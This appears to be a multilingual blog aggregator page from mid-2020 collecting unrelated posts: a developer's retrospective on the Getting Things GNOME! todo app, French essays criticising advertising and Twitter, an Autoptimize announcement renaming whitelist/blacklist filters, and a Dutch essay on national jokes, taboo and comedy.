As a young R&D engineer in my mid-twenties, I quickly discovered the need for an organisational system in order to get things done. Inspired by the Getting Things Done book, I designed my own system but found no software to implement it properly. Most todo software was either too simplistic (useful only for groceries) or too complex (entering a task required to fill tenth of fields in an awful interface). To some extent, this is still the case today. No software managed to be simple and yet powerful, allowing you to take notes with your todos, to have a start date before which it would make no sense to work on the task or to have dependencies between tasks.

I decided to write my own software and convinced my lifelong friend Bertrand to join me. In the summer of 2009, we spent several days in his room drawing mockups on a white board. We wanted to get the UX right before any coding.

Long story short: it looks like we did the right choices and the Getting Things GNOME! (yep, that was the name) quickly became popular. It was regularly cited in multiple Top 10 Ubuntu apps, widely popular in the Ubuntu app store. We even had many non-Linux users trying to port it to Windows because there was no equivalent. For the next four years, I would spend my nights coding, refactoring, developing and creating a community.

The project started to attract lots of contributors and some of them, like Izidor and Parin, became friends. It was a beautiful experience. Last but not least, I switched to a day job which involved managing free software development with a team of rock stars developers. I was literally paid to attend FOSDEM or GUADEC and to work with colleagues I appreciated. And, yes, my head was on planet.gnome and GTG had its own Wikipedia page.

The great stall

Unfortunately, 2014 started with a lay-off at Lanedo, the company I was working for. I started being involved in the local startup scene. I was also giving conferences about Free Software. During one, the screen of my laptop suddenly stopped working. I was able to finish because of the projector, but my laptop was now requiring an external screen.

Being broke and jobless, I bought the cheaper laptop I could find. A Chromebook. With the Chromebook, I started investigating web services.

This is perhaps one of my biggest regrets: not having developed GTG as a webapp. If I had, things would probably have been very different. But I didn’t like web development. And still don’t like it today. In the end, it was not possible to code for GTG on the Chromebook.

After a few months, I landed a job at Elium. My friend and CEO Antoine convinced me to try a company Macbook instead of a Linux laptop. I agreed to do the test and started to dive into the Apple world.

I never found a Todo app that was as good as GTG so I started to try every new shiny (and expensive) thing. I used Evernote, Todoist, Things and many other. I wanted to be productive on my Mac. The Mac App Store helped by showering me in recommendations and new arrivals of fantastic productivity apps.

I didn’t want to acknowledge it but, in fact, I had suddenly abandoned GTG. I didn’t even have a working Linux computer.

I was not worried because there were many very skilled and motivated contributors, the main one being Izidor. What I didn’t imagine at the time was that Izidor went from being a bored student to a full-time Google employee with a real life outside free software.

A Free Software project needs more than developers. There’s a strong need for a « community animator ». Someone who will take decisions, who will communicate and be the heartbeat of the project. It’s a role often forgotten when done by the lead dev. I always was the main animator behind GTG, even at times when I was writing less code than other contributors. Something I didn’t realise at the time.

And while I spent 6 years exploring productivity on a Mac, GTG entered hibernation.


Users were not happy. Especially one : Jeff, who was also a community contributor and is an open source expert. In 2019, he decided to get GTG back from the grave. Spoiler: he managed to do it. He became the heartbeat of GTG while a talented and motivated developer showed up to his call: Diego.

They managed to do an incredible amount of work and to release GTG 0.4. Long live to them! Video of GTG 0.4.

I didn’t write any code but helped as I could with my advice and my explanations of the code. It’s a strange feeling to see your own creation continuing in the hands of others. It makes me proud. Creating a software from scratch is hard. But living to see your software being developed by others is quite an accomplishment. I’m proud of what Diego and Jeff are doing. This is something unique to Open Source and I’m grateful to live it.

What is funny is that, at the same time Jeff called for a reboot of GTG, I went back to Linux, tired of all the bells and whistles of Apple. I was looking for simplicity, minimalism. It was also important for me to listen again to my moral values. I was missing free software.

In hindsight, I realise how foolish my quest of productivity was. I had spent 6 years developing a software to make me more productive. When I realised that and swore to not develop a productivity software anymore,  I spent the next 6 years trying every new productivity gadget in order to find the perfect combo.

It was enough. Instead of trying to find tools to be productive, I decided to simply do what I always wanted to do. Write.

Changing my perspective led me to the awful realisation that people are not using tools because they are useful but because they are trendy. They rationalise afterward why they use the tool but tools are not made to fill real needs. Needs are, instead, created to justify the use of a fun tool. A few years ago, creating a project was all about « let’s create a Slack about the subject ». Last year it was Notions. This year it’s Airtable. When you have a hammer, everything looks like a nail.

After so many years developing and testing every productivity software out there, I can assure you that the best productivity system should, at the very least, not depend on complex app to access your data. By using Markdown files in a very simple and effective folder structure, I’m able to have the most productive system I ever had. A system that could have worked 12 years ago, a system that does not depend on a company or an open source developer. I don’t even need GTG nor GNOME anymore. I’m now working fully in Zettlr on Regolith with a pen and a Moleskine. I’m now able to focus on a couple of big projects at a time.

Jeff would probably say that I evolved from a chaos warrior to a « goldsmith ». At least for the professional part because I can ensure you the parenting part is still fully on the chaos side. Nevertheless, the dedication of Jeff demonstrated that, with GTG, we created a tool which can become an essential part of chaos warrior’s productivity system. A tool which is useful without being trendy, even years after it was designed. A tool that people still want to use. A tool that they can adapt and modernise.

This is something incredible that can only happen with Open Source.

Thanks Bertrand, Izidor, Parin, Jeff, Diego and all the contributors for the ride. I’m sorry to have been one of those « floss maintainers that disappear suddenly » but proud to have been part of this adventure and incredibly happy to see that the story continues. Long live Getting Things GNOME!

Photo by krisna iv on Unsplash.

Je suis @ploum, écrivain électronique. Si vous avez apprécié ce texte, n'hésitez pas à me soutenir sur Paypal ou en millibitcoins 34pp7LupBF7rkz797ovgBTbqcLevuze7LF. Vos soutiens réguliers, même symboliques, sont une réelle motivation et reconnaissance. Merci !

Ce texte est publié sous la licence CC-By BE.

July 06, 2020

La publicité n’est pas si mauvaise. Parfois elle agit. Avec sa propre éthique, il est vrai.

Si elle a lutté durant des décennies pour éviter qu’on interdise la promotion de la cigarette ou de l’alcool, si elle continue à vouloir nous faire acheter des gros SUV en nourrissant nos enfants de canettes et de barres sucrées, elle choisit ses combats.

Numerama rapporte qu’une publicité pour des vélos électriques aurait été censurée, car pouvant induire que l’automobile polluait. La publicité choisit ses combats.

Mais rassurez-vous, votre cerveau l’aura vite oublié.

Car pour lire cet article, Numera vous forcera tout d’abord à visionner une publicité pour un SUV.

La prochaine fois que vous vous demanderez pourquoi on ne fait rien contre le réchauffement climatique, rappelez-vous cette anecdote. Rappelez-vous que tout ce qui touche de près ou de loin à la publicité est coupable. Que même les publicités pour les vélos électriques ne nous sauveront pas ! La publicité, c’est le contraire de l’éducation. C’est transformer nos cerveaux pour les rendre disponibles à des messages simplistes. Le succès des anti-vaccins ou de ceux qui croient que la terre est plate ? Des cerveaux qui ont appris pendant des années à ne surtout pas réfléchir.

La publicité est partout ! Même au bord des circuits de course automobile (alors qu’à la vitesse où ils roulent, ça m’étonnerait que les pilotes aient le temps de les lire).

Tous sont coupables : Les publicitaires, les annonceurs, les.supports, les plateformes et tous ceux qui visionnent la pub sans tenter de s’en protéger activement.

Quoi ? Il ne reste plus grand monde ?

C’est bien là le problème…

Photo by Ploum on Unsplash. Screenshot contribué par Ledub.

Je suis @ploum, écrivain électronique. Si vous avez apprécié ce texte, n'hésitez pas à me soutenir sur Paypal ou en millibitcoins 34pp7LupBF7rkz797ovgBTbqcLevuze7LF. Vos soutiens réguliers, même symboliques, sont une réelle motivation et reconnaissance. Merci !

Ce texte est publié sous la licence CC-By BE.

As of the soon-to-be-released Autoptimize 2.7.4, all occurrences of “blacklist” and “whitelist” in the code will be changed into “blocklist” and “allowlist”. There is no impact for users of Autoptimize, everything will work as before.

If however you are using Autoptimize’s API, there are two (to my knowledge rarely used) filters that are now deprecated and will be removed at a later stage. `autoptimize_filter_js_whitelist` and `autoptimize_filter_css_whitelist` still work in 2.7.4 but if you’re using them switch to  `autoptimize_filter_js_allowlist` and `autoptimize_filter_css_allowlist` to avoid problems when they are removed in the release after 2.7.4.

Small post-publishing clarification dd. 22/07/2020: this post is just an announcement, I feel no urge to discuss the change and am not really interested in arguments pro or contra. Don’t fret over this change, fretting is useless, instead enjoy the summer, kiss your lover, read a good book, … :-)

This post is the third in a four-part blog series by Peter Zaitsev, Percona Chief Executive Officer.

July 04, 2020

Onder de indruk van Ilja Leonard Pfeijffer‘s columns over Corona in Genua las ik tijdens onze vakantie zijn magistrale “Grand Hotel Europa” over liefde, een oud hotel in volle evolutie, het avontuurlijk (en gewelddadig) leven van Carravagio, het genie van Damien Hirsh en vooral over hoe Europa beetje bij beetje een pretpark voor toeristen wordt (Venetië, maar dichterbij ook Amsterdam of ons eigen Brugge?) terwijl we ons blindstaren op ons eigen groots cultureel erfgoed zonder dat we goed weten wat dat inhoudt.

Toegegeven, soms was Ilja me even kwijt wanneer er werd ingegaan op pakweg cultuur-filosofische vraagstukken, maar dat werd ruimschoots gecompenseerd door een sterke rode draad en een gezonde dosis zelfspot. Een aanrader!

Na een zware periode waar ik zelf angst heb gehad, bedacht ik me een paar uur geleden:

Niets blijkt moeilijker te zijn dan te accepteren dat er geen gevaar is.

Ik heb besloten dat dit de nieuwe ondertoon van deze blog wordt. Wat dat juist wil zeggen? Dat een tiental van de komende blog artikels dat als lijn gaan aanhouden.

Clowns to the left of me are prevaricating (uitereraard een verwijzing naar de song die in Reservoir Dogs aanwezig was), is geschiedenis.

Wat was het vorige? Toen dacht ik er vast nog niet zo hard over na. Misschien zou ik dat nu beter ook niet doen? Ik denk te veel over ongeveer alles na.

Dus, daarom de nieuwe ondertitel:

Accepteer, dat er geen gevaar is.

Ik heb hem Nederlands gemaakt. Want de enige groepen die zich in mijn blog interesseren zijn a) jullie of b) misschien staatsveiligheid. Die laatste heeft in dat geval een budget om één en ander te laten vertalen en jullie spreken al Nederlands.

Goed ja. Er is wel wat gevaar natuurlijk. Maar we hebben het eigenlijk erg goed onder controle.

July 03, 2020

July 02, 2020

This post is the second in a four-part blog series by Peter Zaitsev, Percona Chief Executive Officer.

June 30, 2020

Je me suis surpris à envoyer un long email à une personne que je suis depuis plusieurs années sur les réseaux sociaux. J’ai pris le temps de rédiger cet email. De le relire. De le corriger. De l’affiner. J’y exprime une idée simple que j’aurai pu lui envoyer sur Twitter, que ce soit en le mentionnant ou en messagerie privée. Je lui dis, tout simplement, que je ne souhaite plus interagir sur Twitter.

Le fait de prendre du temps, de réfléchir, de me relire m’a procuré un énorme plaisir. J’avais l’impression d’avoir apporté un petit quelque chose au monde, une clarification de mes idées, une main tendue, une piste de réflexion partagée. J’ai construit quelque chose d’intime, où je me révèle.

En tentant de regagner le contrôle de mon cerveau, j’ai retrouvé, sans le vouloir, l’art désuet de la relation épistolaire.

Nous avons oublié l’importance et la facilité de l’email. Nous l’avons oublié, car nous n’en avons pas pris soin. Nous laissons notre boîte aux lettres pourrir sous des milliers de messages non sollicités, nous perfectionnons volontairement l’art de remplir nos boîtes de courriels inutiles, inintéressants, ennuyeux sans plus jamais prendre le temps d’y déposer un courrier utile, écrit, intime.

Nous croyons que le mail est ennuyeux alors que ce sont nos pensées qui sont obscurément désertes. « Ce qui se conçoit bien s’énonce clairement et les mots pour le dire viennent aisément », disait Boileau. Force est de constater que nos cerveaux sont désormais d’infernaux capharnaüms assiégés par d’innombrables tentatives de les remplir encore et encore. Anesthésiés par la quantité d’informations, nous ne trouvons d’échappatoire que dans la consommation.

Souhaitant soigner ma dépendance à Twitter, j’avais décidé de ne plus suivre que quelques comptes sélectionnés dans mon lecteur RSS grâce à l’interface Nitter. En quelques semaines, une froide vérité s’est imposée à moi : rien n’était intéressant. Nous postons du vide, du bruit. Une fois ôtées les fonctionnalités affriolantes, les notifications, les commentaires, le contenu brut s’avère misérable, souffreteux. J’avais pourtant sélectionné les comptes Twitter de personnes particulièrement intéressantes et intelligentes selon mes critères. Las ! Nous nous complaisons tous dans la même fange d’indignation face à une actualité très ciblée, le tout saupoudré d’autocongratulation. Réduite à quelques caractères, même l’idée la plus enrichissante se transforme en bouillie prédigérée conçue pour peupler un hypnotique défilement intinterrompu.

Un soir, alors que je profitais de ma douche pour articuler un concept théorique qui m’occupait l’esprit, j’ai réalisé avec effroi que je pensais en threads Twitter. Mon esprit était en train de diviser mon idée en blocs de 280 caractères. Pour le rendre plus digeste, plus populaire. J’optimisais spontanément certaines phrases pour les rendre plus « retweetables ».

En échange d’un contenu de piètre qualité, Twitter déformait mes pensées au point de transformer mon aquatique méditation vespérale en quête semi-consciente de glorioles et d’approbations immédiates. Le prix payé est inimaginable, exorbitant.

Ayant bloqué tous les sites d’actualité depuis belle lurette, je décidai que Twitter et Mastodon allaient suivre le même régime que Facebook et Linkedin : ne plus suivre personne. Je nourris désormais ma sérendipité d’écrits plus longs grâce à l’ancienne magie vaudoue du RSS.

Libéré, aéré, le cerveau retrouve soudain de la souplesse, de l’amplitude. Au détour d’une blague dans un forum que je suis, je crois deviner qu’un politicien a été mis en prison. L’information m’agresse. Elle occupe une place imméritée dans mon cerveau. Je n’avais pas envie de savoir cet inutile artefact qui sera vite effacé de la conscience publique. Comme un ancien fumeur soudainement allergique à la fumée, mon cerveau ne peut plus supporter les déchets pseudo-informationnels dont nous sommes abreuvés par tous les pores, par tous les écrans, par toutes les conversations.

Une fois débarrassé de cette gangue d’immondices, je me surprends à penser. Mes doigts se surprennent à vouloir écrire plutôt qu’à rafraîchir une page et réagir avec une émotion préfabriquée. Au lieu d’une démonstration publique de mon égotique fierté travestie en succédané de communication, j’ai envie de forger des textes, des histoires, de faire passer une information dans un contexte plus large, de lui donner le temps d’exister dans l’esprit des récipients. Et tant pis si ces derniers sont moins nombreux, moins enclins à m’injecter leurs likes chargés de dopamine.

Devant ma boîte aux lettres, immaculées grâce à une stricte observance des mes règles inbox 0 et de désabonnement, je guetterai la réponse comme un adolescent attend le facteur lui tendant une enveloppe parfumée. Et si elle ne vient pas, ma vie continuera sans que je sois obnubilé par un compteur de vues, de likes ou de partages.

L’outil de communication décentralisé web 5.0, 6.0 et 12000.0 existe déjà. C’est l’email. Nous n’avons tout simplement pas encore vraiment appris à l’utiliser. Nous tentons vainement de le remplacer ou de l’améliorer à grands coups d’interfaces et de fonctionnalités multicolores, car il expose la vacuité de nos interactions. Il met à nu que nous devrions faire un effort, changer notre cerveau et notre volonté. Tant que nous nous évertuerons à produire et consommer le plus de bruit possible en insatiables gloutonneries, tant que nous mesurerons notre succès avec d’autocrates statistiques, aucun système ne nous permettra de communiquer. Parce que ce n’est pas ce que nous cherchons. Parce que nous nous sommes perdus dans l’apparence et la quantité, jetant aux oubliettes l’idée même de qualité. Nous critiquons la faiblesse d’esprit et le court-termisme de nos politiciens sans réaliser que nous moquons notre propre reflet.

Lorsque nous serons assez mûrs pour tout simplement vouloir échanger de l’information de qualité, nous découvrirons que la solution était sous nos yeux. Si simple, si belle, si élégante, si décentralisée.


Photo by Matt Artz on Unsplash

Je suis @ploum, écrivain électronique. Si vous avez apprécié ce texte, n'hésitez pas à me soutenir sur Paypal ou en millibitcoins 34pp7LupBF7rkz797ovgBTbqcLevuze7LF. Vos soutiens réguliers, même symboliques, sont une réelle motivation et reconnaissance. Merci !

Ce texte est publié sous la licence CC-By BE.

Here are the steps needed to add a new SWAP partition to your Linux machine. This’ll allocate 2GB of space on your disk, and allow it to be used as RAM if your server is running low.

June 29, 2020

This post is the first in a four-part blog series by Peter Zaitsev, Percona Chief Executive Officer.
Quick tip if you want to skip the pre-commit validations and quickly want to get a commit out there.

June 27, 2020

Cover Image - Chad and Virgin Laughing
"Een gevoel voor humor weerspiegelt een gevoel van verhouding. Het schiet in actie wanneer een verstandiger deel van ons een gesloten gedachtengoed kortsluit."

Toen ik klein was, was het de gewoonste zaak in Europa om te lachen met onze internationale buren. We waren onofficiële rivalen, soms wederzijds, soms enkel richting, volgens de culturele en historische stereotypes van die tijd.

De 'Hollanders' grapten over ons:

Een Belgische bouwvakker helpt mee over de grens in Nederland, en ziet een Nederlander koffie schenken uit zijn thermoskan.

"Wat is dat?" vraagt hij.
"Dat is een thermos! Als je er iets warm in giet, blijft het warm. Als je er iets koud in giet, blijft het koud."
"Geniaal! Hoeveel wilt ge ervoor?"
"Je mag 'em hebben voor 25 gulden."

De volgende dag werkt hij weer in België en toont hij trots zijn nieuwe vondst aan zijn collega's.

"Dat is nen thermos! Als ge er iets warm in giet, blijft het warm. Als ge er iets koud in giet, blijft het koud."
"Wauw! En hoe weet dat ding dat?"

Wij tapten natuurlijk ook mopjes over hen:

Een bus met 50 Nederlandse vakantiegangers rijdt naar de Costa del Sol en stopt aan een tankstation in België.

De chauffeur vraagt aan de bediende: "Kan ik soms een emmer water krijgen? Mijn motor kan niet goed tegen deze hitte!"

"Geen probleem!" Hij verdwijnt en keert terug met een grote klotsende emmer.

"En euh... heb je soms 51 rietjes?"

Omdat Belgen (lees: Vlamingen) dom waren, en Nederlanders gierig. Dit zijn eigelijk veel properdere moppen dan die van ons, zoals:

"Hoeveel keer gebruikt een Nederlander een condoom?"
"Drie keer. Eén keer gewoon, één keer binnenstebuiten, en de derde keer als kauwgom."

(Dit was nog in de basisschool, FYI)

Maar de grap heeft een karmische omkering:

"Hoeveel keer lacht een Belg met een mop?"
"Drie keer. Eén keer als je ze vertelt, één keer als je ze uitlegt, en de derde keer wanneer hij ze snapt."

Asterix and Obélix - Map of Gaul

Europa Universalis

Wie even googlet ontdekt snel dat de basismoppen over nationaliteit extreem pro forma zijn. Je kan grotendeels gewoon de landen omwisselen of veranderen, om zo een andere mop te krijgen die ooit ook wel eens verteld werd. Zoals deze klassieke mop over de treintunnel:

Een non, een mooie blonde dame, een Duitser en een Nederlander zitten samen in een treincompartiment. De trein rijdt een tunnel in, het is pikdonker, en plots is er een klap. Wanneer de trein terug het licht in rijdt, wrijft de Duitser met pijn in zijn gezicht.

De non denkt: "Die Duitser heeft waarschijnlijk de dame aangeraakt, en ze heeft hem correct op de vingers getikt."

De dame denkt: "Die Duitse vetzak heeft mij proberen aan te randen, maar zat per ongeluk bij de non. Goed dat ze hem een mep heeft gegeven."

De Duitser denkt: "Die Nederlander heeft waarschijnlijk zijn handen niet kunnen thuis houden, maar die blonde dacht dat ik het was! De klootzak!"

De Nederlander denkt: "De volgende tunnel geef ik die vuile Duitser weer een mep!"

De landen zijn nabije buren, dus is er altijd wel één of andere stereotiepe, historische ruzie. Als je de landen verandert, kan de mop ook omslaan, naargelang wat je vooroordelen zijn.

Als de Nederlander agressief is, dan zou je kunnen denken dat het wraak is voor de Duitse agressie tegenover Nederland. Als je een versie vertelt waarbij de Duitser de Nederlander slaat, dan zou dat misschien unilaterale Duitse agressie kunnen voorstellen. De reden waarom de mop met nationaliteiten verteld wordt is ook waarom het om een non en een mooie blonde dame gaat: het voegt de nodige kleur toe, zodat de personages (en het publiek) meteen allerlei verkeerde conclusies kunnen trekken.

Je denkt dat de nationaliteiten belangrijk zijn, maar dat wordt eigelijk nooit gezegd. Het misleidt je, zodat je mee kan volgen. De echte clou is dat je geen ingewikkelde uitleg nodig hebt voor een regelrechte aanval. Een mop over nationale agressie kan universele thema's blootstellen, met 4 tegenstrijdige perspectieven, die ook allerlei andere gevoelige snaren aanraken.

Je moet natuurlijk wel rekening houden dat het Europa waarin zulke moppen vaak verteld werden helemaal anders was dan vandaag. De hint zit in de "25 gulden" in de eerste mop. Dit was vóór de Euro, voor de douane-unie, de Schengen zone, en moderne elektrische treinen om het allemaal netjes mee te verbinden. Je moest gewoon enkele uren in eender welke richting rijden om een plaats te vinden waar je toestemming nodig had om binnen te komen, waar je de taal niet sprak, niet wist hoeveel zaken kostten, de plaatselijke wetten niet kende, en niet op gelijk niveau kon omgaan met de instanties. Dit waren ook dezelfde mensen wiens voorouders jouw voorouders enkele eeuwen lang hadden zitten uitmoorden... maar ze leken nu toch wel grotendeels ok?

Als je in zulk een situatie leeft, dan is het perfect normaal om het allemaal te trivialiseren en er moppen over te tappen. Doen alsof het allemaal een ver-van-mijn-bed-show is. Om te zeggen: als we toch allemaal personages gaan zijn in een drama waar niemand van ons eigelijk veel in te zeggen heeft, laat ons er dan maar wat lol mee hebben. Sommige van deze moppen bevatten natuurlijk wel een enorme hoeveelheid historische en culturele context, bijvoorbeeld:

In de hemel zijn de flikken Brits, de chef-koks Frans, de mecaniciens Duits, de minnaars Italiaans, en dit alles georganiseerd door de Zwitsers.

In de hel zijn de chef-koks Brits, de mecaniciens Frans, de minnaars Zwitsers, de flikken Duits, en dit alles georganiseerd door de Italianen.

Dat is een gepeperde samenvatting van ongeveer 150 miljoen mensen over een periode van op z'n minst een eeuw. Wie zulke moppen vertelde deed dat niet uit haat. Wanneer een Mysterieuze Vreemdeling effectief ons dorpje binnenkwam, dan waren de meesten vooral heel nieuwsgierig en vriendelijk. Je deelde ze ook niet tenzij je al goed overeenkwam (of net absoluut niét), en je de pretentie dus achterwege kon laten. De doelgroep was vooral onze eigen stam, en het doel was net om de collectieve onrust en angst van het vreemde in te perken. Als je iemand een mop over hen vertelt, geef je iets heel intiem bloot.

Bij de Belgen en de Nederlanders moet je niet ver gaan zoeken. Onze angst was dat ze ons zouden wegconcurreren met hun superieure kennis van zaken. Hun angst was dat ze zouden verliezen tegen een volk dat ze onwaardig vonden.

Dit zijn universele thema's.

Vrij Spel

Het is enorm waardevol als je iemand kan horen spreken zonder filter, met of zonder humor. En ik bedoel niet dat je citaten kan gaan mijnen om ze zwart mee te schilderen.

Lang geleden was ik bij nieuwe vrienden die nog niet wisten dat ik homo was. Ze waren aan't lachen met hún homoseksuele kotmaat. Deze kerel gebruikte namelijk regelmatig enorme hoeveelheden WC-papier, en dat probeerden ze dus uit te leggen door de connectie te maken met zijn veronderstelde seksuele activiteiten aan de achterpoort. Ik heb er niks van gezegd, en ik had zeker geen zin in een instant "coming out". Ik lachte gewoon mee, en het gesprek ging verder.

Vandaag de dag vinden sommigen dat dit ongetwijfeld homofoob was. Dat zulke humor bekrompen is en de waardigheid van het doelwit aantast. Dat zulk materiaal met allerlei waarschuwingen moet bestempeld worden, en dat zij die er vrij over spreken zich moeten verontschuldigen en boete doen. Dat het niet alleen toepasselijk maar onze morele plicht is om in te grijpen (en het zo allemaal rond mij te laten draaien, handig).

Ik wist daarentegen dat deze kerels aan't lachen waren omdat ze er niet over durfden praten met de jongeman in kwestie. Je gaat niet zomaar effe over iemand anders zijn toiletbezigheden babbelen. Eens je die verbinding maakt tussen humor en taboe, is het echt niet zo verbazend dat toilethumor bestaat.

Ik denk ook dat als ze wél hadden geweten dat ik homo was, dat ze die allusies niet hadden gemaakt, of zich erover geschaamd hadden, en dan was het een Gênante Situatie geweest. In plaats daarvan konden ze een moeilijke vraag aankaarten, over iemand waar ze mee samenwoonden, en leesbaar maken. Ik kon gewoon "één van de kerels" blijven, door de regels, context en bedoeling te vatten. Als ik dat vandaag de dag wil, dan moet ik gewoon achter gesloten deuren iets grappig en grof over homo's zeggen, om te tonen dat het geen gevaarlijke valkuil moet zijn.

Dit is hoe de LGBT-wereld het al decennia lang aanpakt. Drag queens gebruiken hun humor en spot bijvoorbeeld als een pantser, maar het is enkel volwaardig als je ook met jezelf kan lachen. The Adventures of Priscilla: Queen of the Desert (1994) heeft dit fantastisch in beeld gebracht:

Ik vind mij dus volledig in dat citaat van John Cleese over hoe een verstandiger deel van ons een gesloten gedachtengoed kan kortsluiten.

Het benadrukt ook weer dat humor compleet contextueel is, omdat het de bedoeling net is om te dansen op de rand van wat je mag zeggen en denken. Als er iets taboe is, als er iets bekrompen is, dan jaagt komedie daar het meest achter.

Als voorbeeld, neem twee scenes, met twee jaar verschil. Eerst, het begin van American Pie (1999):

Het hoofdpersonage wordt door zijn conservatieve ouders betrapt terwijl hij zich aftrekt en illegale TV-porno probeert te kijken. De scene wordt grotendeels serieus gespeeld. Dit was redelijk stout in zijn eigen tijd, als mainstream Amerikaanse film, en weerspiegelde de Christelijke taboes rond tienerseks. Vooral als je weet dat de American Pie in de titel óók haar maagdelijkheid verliest. Dit was zo memorabel dat de New York Times er 20 jaar later een opiniestuk over publiceerde. Als iemand zich er toen beledigd door voelde, dan waren dat vooral mensen die op de ouders leken, die niet over seks konden denken of praten zonder te blozen.

Vandaag echter zijn het vooral mensen van de politieke overkant die deze film grof en beledigend gaan vinden. De redenen zijn het seksisme, de homograppen, enzovoort. Als je de pers gelooft zijn er een hoop die ontevreden zijn, maar eigelijk denk ik dat ze gewoon een excuus wilden om een filmpje te posten van een kerel die doet alsof hij een appelvlaai neukt.

Veel interessanter is hoe deze scene geparodieerd werd in Not Another Teen Movie (2001). Over deze film valt veel te vertellen, omdat het met verve allerlei jaren 80 en 90 tienerfilmclichés aan elkaar breit. Ze nemen zichzelf absoluut niet serieus door net het bronmateriaal heel serieus te nemen, met fantastische vertolkingen. Het begint dus met een directe hommage aan American Pie, alleen hebben ze echt ieder aspect van die scene tot absurde proporties uitvergroot:

Het is compleet logisch als je snapt dat tienerseks en hormonale drang toen heel controversieel was. In plaats van een verlegen kerel met een sok, krijgen we dus een onvervaarde jonge dame met haar XXL roze vibrator met bloemekes. Iedereen loopt de kamer binnen, zelfs oma en de pastoor. Het eindigt met een slagroombukkake, om zo de film in te luiden. En ze gaan gewoon zo verder, door telkens het bronmateriaal slim te verknippen met een overgrote dosis WC-, seks- en andere humor. Dat lukt grotendeels, met slechts enkele verkeerde pasjes, zoals de grap over het Obligatoire Zwarte Personage die heel de film lang uitgerekt wordt.

Als je dacht dat het mikpunt net vrouwen was, of LGBTs, of zwarten, dan heb je het helemaal niet gesnapt. Want dit was een grote middenvinger in de richting van puriteinse moraalridders. Zij maakten zich toen bijvoorbeeld ook druk over een paar blauwe tetten in profiel, in een videospel dat ze zelf nooit gespeeld hadden.

Het doelpubliek vond de film in ieder geval hilarisch, wat natuurlijk het belangrijkste is.

De Grapruimte

Ik heb vooral voorbeelden gebruikt die nu verouderd lijken, en zelfs te provinciaal.

Moppen over internationale rivalen zijn grotendeels verdwenen, omdat we nu veel meer over elkaar weten. Dankzij open grenzen, en een geharmoniseerde economie en wetboeken, hebben we een leesbaar continent waar iedereen gemakkelijk met elkaar kan vergelijken. We hoeven geen grappen meer te maken over welk land het beste draait, we kunnen samen gewoon naar de COVID-cijfers gaan kijken.

Je gaat zulke humor vandaag de dag vooral tegenkomen in de context van een Aprilgrap of "shitposting", zoals deze twee memes:


Meestal gepost door respectief een Nederlander of een Belg, verwijzend naar het Nederlandse talent voor imperialisme en het Belgische talent voor onnodige bureaucratie. Het wilt zeggen dat er vooral dus Nederlanders of Belgen in een bepaalde discussie of ruimte rondhangen. Maar het mag eigelijk enkel ironisch gebruikt worden, want anders is het heel tiresome.jpg.

Seksuele humor is ook grotendeels verminderd, omdat het internet ons pornografie én normale seksuele opvoeding geeft in overvloed, en de basistaboes verdwenen zijn. In plaats van een groepje studenten die zich allemaal afvragen hoe homo's het nu feitelijk doen, heb je een hoop kerels die er ooit wel eens naar gekeken hebben, er niks aan vonden, en er verder niet meer over hebben nagedacht.

De ruimte van aanvaardbare en populaire grappen evolueert dus continu. Men zegt ook soms: "Als je wilt weten wie over jou heerst, zoek uit wie je niet mag bekritiseren." Dit telt dubbel voor "...of waar je niet mee mag lachen."

Dit wordt vaak en onjuist toegeschreven aan Voltaire, maar vreemd genoeg blijkt het uit een essay van 1993 te komen, geschreven door een echte, effectieve, onvervalste blanke nationalist. TIL.

Het maakt natuurlijk niks uit wie het gezegd heeft, enkel of het waar is of niet. Men zegt gemakkelijk dat het niet waar kan zijn, omdat je bijvoorbeeld niet mag spotten met mentaal gehandicapten, die zich zeker niet kunnen verdedigen. Maar dat is niet juist, want zulke spot lokt natuurlijk een reactie uit van zij die wél de macht hebben om mensen te straffen, namelijk allerlei organisaties die ogenschijnlijk de rechten van bepaalde groepen bevorderen.

Het probleem hiermee is dat dit systeem gedreven wordt door aandacht, niet door resultaten. Het essay The Toxoplasma of Rage beschrijft dit in detail, geschreven door onlangs onthulde blogger Scott Alexander Ocasio-Cortez. Wanneer de keuzes die het meest beloond worden nét die zijn die het meeste aandacht trekken, dan versterk je vaak de spanning tussen verschillende groepen in plaats van ze te verminderen, en schep je meer wrok.

Het verwart ook zij die reeds hulp kunnen krijgen met zij die er nog steeds nood aan hebben. Als toonvoorbeeld, wat er hier een tijd geleden gebeurde: een oude Joodse vrouw belde een stand-by verpleegdienst op (als ik het mij goed herinner). Toen de verpleegkundige hoorde dat ze Joods was, verweet die haar al de collectieve zonden van Israel tegen Palestina, en was verder grof en onbehulpzaam. Ik weet het alleen maar omdat het de dag erna in alle kranten stond, omdat een pro-Joodse organisatie het had aangekaart.

Het zou heel anders gegaan zijn als het bijvoorbeeld een dakloze of een drugsverslaafde was die immoreel behandeld werd. Het zou praktisch onmogelijk zijn dat zo iemand op die manier erkenning kan krijgen, laat staan compensatie. Of je dat nu "heersen" wilt noemen of niet, het zijn twee compleet verschillende niveaus van toegang en dienstverlening, met als enig verschil welke groep van mensen je nu wel of niet mag generaliseren.

Een ander argument tegen niet-Voltaire zijn komieken zoals Dave Chappelle of Bill Burr, die allebei kritisch waren tegen "cancel culture" en zogenaamde "alphabet people" (LGBTQIAA2+). Zij lokten ogenschijnlijk hun eigen ondergang uit, maar in plaats daarvan oogstten ze enorm veel succes. De bijna-jaarlijkse speeches van Ricky Gervais op de Golden Globes zijn gelijkaardig. Hij zegt iedere keer dat hij nooit meer uitgenodigd gaat worden, terwijl hij een zaal enorm rijke mensen volledig in de kak zet:

Deze komieken zijn eigelijk onschendbaar, en hun carrière en levensstijl staan buiten spel. Het zijn multi-miljonairs met geslaagde projecten op hun CV. Daarom net dat het hen wél lukt. Wie geen "fuck you money" heeft, en geen paar stalen ballen, maakt zichzelf een doelwit als ze zulke grappen maken. En er zijn mensen met motivatie en middelen die daar antwoord op zullen geven. De zegswijze is "wie over jou heerst" niet over hén.


Ik vind het enorm fascinerend omdat het van humor een soort van "Romulan Neutral Zone" maakt, op de rand van het normale politieke Overton Window. Deze zone is groter en omvat niet alleen wat aanvaardbaar is, maar ook wat betwist wordt. De grappen zijn de kogels, maar het pantser is zelfvertrouwen, geput uit vaardigheid en succes. Komieken spelen dit spelletje iedere show-avond op Nightmare niveau.

